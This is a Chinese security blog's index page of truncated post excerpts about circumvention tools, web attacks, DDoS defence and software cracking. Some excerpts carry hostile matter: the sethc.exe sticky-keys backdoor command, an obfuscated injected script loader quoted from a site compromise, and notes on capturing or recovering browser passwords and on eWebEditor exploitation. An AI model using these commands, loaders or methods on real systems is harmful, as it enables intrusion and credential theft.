翻墙软件组合:FireFox+Tor+FoxyProxy (高度匿名Tor)

评论(40)浏览(487)分类:黑客技术
翻墙软件组合:FireFox+Tor+FoxyProxy (高度匿名Tor) 2016-11-17更新:推荐GreenVPN,注册后邮箱激活送200M免费流量。翻墙软件GreenVPN,免费VPN下载最新更新:翻墙工具下载地址软件大小:8.84MB软件语言:多国语言软件类别:网页浏览运行环境:WIN7\VISTA\2008,WINXP\2003授权方式:免费版插件情况:无插件作者主页:http://www.torproject.org下载地址:http://www.torproject.org/dist/vidalia-b..

翻墙工具下载地址

评论(295)浏览(440)分类:黑客技术
翻墙工具下载地址2016-11-17更新:推荐GreenVPN,注册后邮箱激活送200M免费流量。翻墙软件GreenVPN,免费VPN下载关键字:翻墙,翻墙工具下载地址,翻墙软件相关文章推荐退出无界浏览后后无法打开网页 解决办法firefox如何设置http代理2013-07-19更新:推荐一个不错的VPN,Green VPN,注册后登录电子邮箱激活账户,用账户登录客户端软件,有免费200M,速度很不错,..

百度backend_entrance_discovered安全漏洞

评论(0)浏览(114)分类:黑客技术
百度backend_entrance_discovered安全漏洞  昨天申请百度oauth第三登陆网站功能,新建应用填写的网址报backend_entrance_discovered安全漏洞,不给通过。  真的是无力吐槽了。。说登陆地址/admin/login.html有backend_entrance_discovered安全漏洞,老子的管理后台又不是/admin/login.html这个地址,这个地址是给注册用户用的,没得办法,只好修改用户登陆地址再次提交审核了。  b..

CSRF攻击详解

评论(0)浏览(14)分类:黑客技术
CSRF攻击详解一.CSRF是什么?  CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。二.CSRF可以做什么?  你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货..

黑客Un Oracle注射笔记

评论(0)浏览(14)分类:黑客技术
黑客Un Oracle注射笔记Oracle说明: Oracle的注射攻击学习,可以归为:a.基本猜解: 1. 数据库名的猜解,表名的猜解,字段的猜解,数据的猜解.等基本数据的猜解.(半折法) 2. union方式猜解 3. UTL_HTTP.request反弹数据猜解.(需能上网) 4. 其它方式的猜解,诸如把表段内容,update或insert入可以显示的字段里,诸如网页,然后读取获知.b.高级攻击方式: 1. 数据库提权攻击,一般是利..

如何反编译Silverlight文件

评论(0)浏览(58)分类:黑客技术
如何反编译Silverlight文件  下面为反编译Silverlight文件步骤,将Silverlight.Net首页的Silverlight作为例子。1. 首先打开Silverlight.Net,该页面中包含一个Silverlight导航动画;2. 在浏览器中,点击右键,查看页面源代码;3. 在html源代码中搜索xap,很快就能定位出xap的位置。我们看到param name=Source value=clientBin/showcasenav/ShowcaseNav.xap /该value就是..

DDoS原理及防范

评论(0)浏览(38)分类:黑客技术
DDoS原理及防范内容DDoS攻击概念被DDoS攻击时的现象黑客是如何组织一次DDoS攻击的?DDoS攻击实例 - SYN Flood攻击DDoS的防范参考资料 关于作者DDoS攻击概念  DoS的攻击方式有很多种,最基本的DoS攻击就是利用合理的服务请求来占用过多的服务资源,从而使合法用户无法得到服务的响应。  DDoS攻击手段是在传统的DoS攻击基础之上产生的一类攻击方式。单一的Do..

外链图片的风险分析

评论(0)浏览(48)分类:黑客技术
外链图片的风险分析  下面是插入外链图片的3中风险No.1 HTTP401  (严重程度:低)  大家都见过,打开路由器的时候会弹出个登录框。      如果了解HTTP协议的话,这是服务器返回401,要求用户名密码认证。  不过,如果是一个图片的请求,返回401又会怎样呢?很简单,我们就用路由器的URL测试下:img src=http://192.168.1.1/    居然依旧跳出了..

折腾你的浏览器

评论(0)浏览(14)分类:操作系统及应用软件
折腾你的浏览器  大家平时也遇到过,一些截图保存成png格式会小很多很多,而且画质完全没变。原因很简单,图片里的颜色数少,而且有大量的重复空白。经过zip压缩之后,相同二进制数据都被合并掉了,产生冗余很小的数据。而且是无损压缩,所以画质不会下降。   所以现在来创建一个重复数据特别多的图,由于本人没有深入研究过zip的具体实现,不知道怎样才算..

解决sethc.exe后门入侵

评论(0)浏览(197)分类:黑客技术
解决sethc.exe后门入侵  sethcexe入侵非常简单, 用COPY命令将cmd.exe复制为sethc.exe,这样在登陆界面是连按五下左SHIFT就可以调出我们可爱的CMD命令窗口SHELL(系统权 限)了!----------------------copy cmd.exesethc.exe,最后重启后进入登陆介面...现在我们连续按五下左SHIFT..出现了个cmd命令窗口,它是shell(系统权限).... 使用DOS命令:net user administrator ..

防sql注入参数处理要点

评论(0)浏览(42)分类:黑客技术
防sql注入参数处理要点  下面的示例代码以VBScript为例,介绍防sql注入参数处理要点,只要在操作数据之前,按照下面的步骤对客户端提交的参数进行验证,一般不会出现sql注入问题,最多是脚本出错,在cint语句那里读数据库,使用连接字符串构成sql语句的,需要执行下面的操作  1)如果参数为字符串,将'替换掉xx=replace(request(xx),',)  2)如果参数为..

入侵445端口详解

评论(0)浏览(43)分类:黑客技术
入侵445端口详解445端口入侵,在这之前我们首先要看的还是445端口为什么回成为入侵的端口呢?445端口就是IPC 服务的默认端口 ipc$一 摘要二 什么是 ipc$三 什么是空会话四 空会话可以做什么五 ipc$ 所使用的端口六 ipc 管道在 hack 攻击中的意义七 ipc$ 连接失败的常见原因八 复制文件失败的原因九 关于 at 命令和 xp 对 ipc$ 的限制十 如何打开目标的 IPC$ 共享..

HTTP POST慢速DOS攻击apache

评论(0)浏览(362)分类:黑客技术
HTTP POST慢速DOS攻击apache1. 关于HTTP POST慢速DOS攻击  HTTP Post慢速DOS攻击第一次在技术社区被正式披露是今年的OWASP大会上,由Wong Onn Chee 和 Tom Brennan共同演示了使用这一技术攻击的威力。他们的slides在这里:http://www.darkreading.com/galleries/security/application-security/228400167/slide-show-ddos-with-the-slow-http-post-attack.html  这个攻..

防ddos攻击防火墙推荐

评论(0)浏览(53)分类:黑客技术
防ddos攻击防火墙推荐  推荐一款防ddos攻击的防火墙,可以防syn,ack,udp,icmp,cc攻击,效果还不错的。因为这3天公司服务器一直被一个垃圾流氓ddos,是udpflood流量攻击,平均流量流入流出15M左右的流量,在安装了这个冰盾防火墙后,响应流量没有了,流入的总流量和机房限制的带宽持平,网站总算是可以打开了,虽然还是有点慢。然后过一段时间以后就没再攻击了,..

CC攻击分析和防范方法

评论(0)浏览(23)分类:黑客技术
CC攻击分析和防范方法  1. CC基本原理分析  CC攻击利用代理服务器向网站发送大量需要较长计算时间的URL请求,如数据库查询等,导致服务器进行大量计算而很快达到自身的处理能力而形成DOS,而攻击者一旦发送请求给代理后就主动断开连接,因为代理并不因为客户端这边连接的断开就不去连接目标服务器,因此攻击机的资源消耗相对很小,而从目标服务器看来,来自代理的..

CC攻击症状

评论(0)浏览(17)分类:黑客技术
CC攻击症状 CC攻击是DDoS(分布式拒绝服务)的一种,相比其它的DDoS攻击CC似乎更有技术含量一些。这种攻击你见不到虚假IP,见不到特别大的异常流量,但造成服务器无法进行正常连接,一条ADSL的普通用户足以挂掉一台高性能的Web服务器。由此可见其危害性,称其为Web杀手毫不为过。最让站长们忧虑的是这种攻击技术含量不是很高,利用工具和一些IP代理,一个初、..

解决CC攻击关键点

评论(0)浏览(35)分类:黑客技术
解决CC攻击关键点解决CC攻击关键点  1、大部分的HTTP代理服务器代理源client向服务器发出的数据包带有X-Forwarded-For特征。  2、针对CC攻击非HTTP端口的时候可以通过过滤HTTP请求特有的GET特征进行过滤。  3、对付CC攻击,区别非正常连接要在代理服务器和被攻击的服务器完成三次握手进行数据通讯的时候进行检测。检测出后要及时关闭服务器相应的非正常连接..

服务器被DDOS解决方案

评论(0)浏览(34)分类:黑客技术
服务器被DDOS解决方案  ICP内 容网站、论坛社区BBS、电子商务eBusiness、音乐网站Music、电影网站File等网站服务器越来越普及,但由于种种原因往往会遭受竞争对手 或打击报复者的恶意DDOS攻击,持续的攻击会导致大量用户流失,严重的甚至因人气全失而被迫关闭服务器,为了最大程度的保护运营者的利益,冰盾科技结合 多年抗DDOS的实践经验给出了最少的安全投资可获得..

冰盾DDoS防火墙介绍

评论(0)浏览(78)分类:黑客技术
冰盾DDoS防火墙介绍软件名称:冰盾DDoS防火墙(国庆60年特别版)V9.3 Build 90923发布日期:2009年9月23日软件大小:1.77MB下载地址:http://www.bingdun.com/bdfwsetup.exe软件语言:中文软件类别:国产软件/服务器类或防火墙类软件性质:免费正式版应用平台:Win2000/2003开发厂商:北京补天信息科技有限公司官方网站:http://www.bindun.com软件介绍:一、【冰盾简..

服务器安全设置七则

评论(0)浏览(72)分类:黑客技术
服务器安全设置七则 服务器上是否存有一些不能随意公开的重要数据呢?当然有吧?而最近,偏偏服务器遭受的风险又特别大,越来越多的病毒、心怀不轨的黑客,以及那些商业间谍都将服务器当作目标。很显然,服务器的安全问题一刻都忽视不得。  技巧一:从基本做起  从基本做起是最保险的方式。你必须将服务器上含有机密数据的区域通通转换成NTFS格式;同理,防毒程..

如何防范udpflood攻击

评论(0)浏览(315)分类:黑客技术
如何防范udpflood攻击UDP Flood攻击原理  UDP Flood是日渐猖厥的流量型DoS攻击,原理也很简单。常见的情况是利用大量UDP小包冲击DNS服务器或Radius认证服务器、流媒体视频服务器。 100k pps的UDP Flood经常将线路上的骨干设备例如防火墙打瘫,造成整个网段的瘫痪。由于UDP协议是一种无连接的服务,在UDP FLOOD攻击中,攻击者可发送大量伪造源IP地址的小UDP包。但是..

悲剧,translate.google.cn也被墙了

评论(0)浏览(362)分类:黑客技术
悲剧,translate.google.cn也被墙了  今天使用translate.google.cn进行翻译的时候,发现好久没反应,然后一刷新页面,尽然出现下面的错误连接被重置 载入页面时到服务器的连接被重置。 * 此站点暂时不可用或者太忙。请稍后重试。 * 如果您无法载入任何页面,请检查您计算机的网络连接。 * 如果您的计算机受到防火墙或代理服务器的保护,请确认 Firefox 被授权访问网页。  等了..

ad.zom123.net弹窗木马

评论(0)浏览(80)分类:黑客技术
ad.zom123.net弹窗木马  最近看到朋友的网站第一次访问的时候会转向到ad.zom123.net这个网址,然后弹窗窗口,还以为我电脑中病毒了,后面在网上查找好像有很多都有ad.zom123.net这个问题。  出现这个问题就是基本是你的站被黑了,一些公用js文件被插入了下面的JavaScript代码+展开-JavaScriptdocument.write('sc'+'riptsrc="\/sc'+'ript'"http://%61d'+'.%7ao'+'m..

如何截获浏览器密码框输入的密码

评论(0)浏览(202)分类:黑客技术
如何截获浏览器密码框输入的密码偷窥桌面程序和IE浏览器的密码编辑框作者:Zhefu Zhang编译:VCKBASE 原文出处:SuperPassword SPY++下载源代码:浏览器密码输入框密码截获软件环境:VC6/VC7, MS Platform Core SDK, IE4.0+, WinNT/2K/XP (在英文/中文/日文版的Win2k/XP 及IE6.0+SP1上测试通过)关键字:Windows 钩子,IE COM 对象,Win2k 安全上下文 IE编程 工具 系统摘要 ..

破解查看IE浏览器保存的密码

评论(0)浏览(412)分类:黑客技术
破解查看IE浏览器保存的密码使用软件IE PassView即可轻松破解查看IE浏览器保存的密码。下载地址IE PassView(IE浏览器密码看器) v1.20下载1、运行iepv.exe,软件立即读取当前保存的密码并显示出来。如图所示,显示的信息有保存密码对应的网站、密码的类型(自动完成或者是密码保护的网站的密码、FTP等)、用户名、密码。2、双击找到的数据项,可以用另一种方式直观地显示密码。..

Ewebeditor漏洞整理

评论(0)浏览(54)分类:黑客技术
Ewebeditor漏洞整理   这个编辑器按脚本分主要有4个版本,ASP/ASPX/PHP/JSP 每个版本都有可以利用的漏洞。判断网站是否使用了eWebEditor  查看程序源代码,看看源码中是否存在类似“ewebeditor.asp?id=”语句,只要有此语句的存在,就能判断网站确实使用了WEB编辑器。另外一种方法就是站上新闻或者其他板块上找图片、附件等的链接,是否为admin/eWebEditor/Uplo..

图解软件破解详细步骤

评论(0)浏览(23)分类:黑客技术
图解软件破解详细步骤1、要破解的软件2,脱壳:双击脱壳AspackDie.exe,出现一个对话框,选择网络填表终结者:FormGhost.exe,打开。如图3。出现图4框,点确定脱壳完成。在网络填表终结者:FormGhost.exe同目录下生成一个unpacked.exe文件,这就是脱壳后的FormGhost.exe。3,运行脱壳后的unpacked.exe,点帮助----注册,图9。注册名称,注册码随便添。图10。点注册,..

软件破解步骤

评论(0)浏览(43)分类:黑客技术
软件破解步骤 为了让大家对破解有个整体概念,我做了一张破解流程图。大家通过图可以看出,破解的最后结果有两种。一是修改代码,进行暴力破解。另一种是推出算法,写出注册机;看图上箭头方向可知:暴力破解,有三个途径: 1.查壳——反编译——追踪调试——暴力破解2.查壳——工具脱壳——反编译——追踪调试——暴力破解3.查壳——手工脱壳(找oep)——手工..

软件破解工具集合

评论(0)浏览(27)分类:黑客技术
软件破解工具集合破解软件的工具 1.调试工具softice  2.调试工具Trw2000  3.反汇编工具Wdasm8.93   4.Hiew  5.Visual Basic程序调试工具Smartcheck  6.十六进制编辑器(如:Ultraedit、WinHex、Hex Workshop 等)  7.注册表监视工具RegShot、regmon或RegSnap  8.侦测文件类型工具TYP、gtw或FileInfo等  9. 脱壳工具PROCDUMP   10.调试工具I..

DDoS攻击使用的常用工具

评论(0)浏览(83)分类:黑客技术
DDoS攻击使用的常用工具DDoS攻击使用的常用工具  DDoS攻击实施起来有一定的难度,它要求攻击者必须具备入侵他人计算机的能力。但是很不幸的是一些傻瓜式的黑客程序的出现,这些程序可以在几秒钟内完成入侵和攻击程序的安装,使发动DDoS攻击变成一件轻而易举的事情。下面我们来分析一下这些常用的黑客程序。以下程序在中安网培的软件区可以下载(www.hackervip.com/so..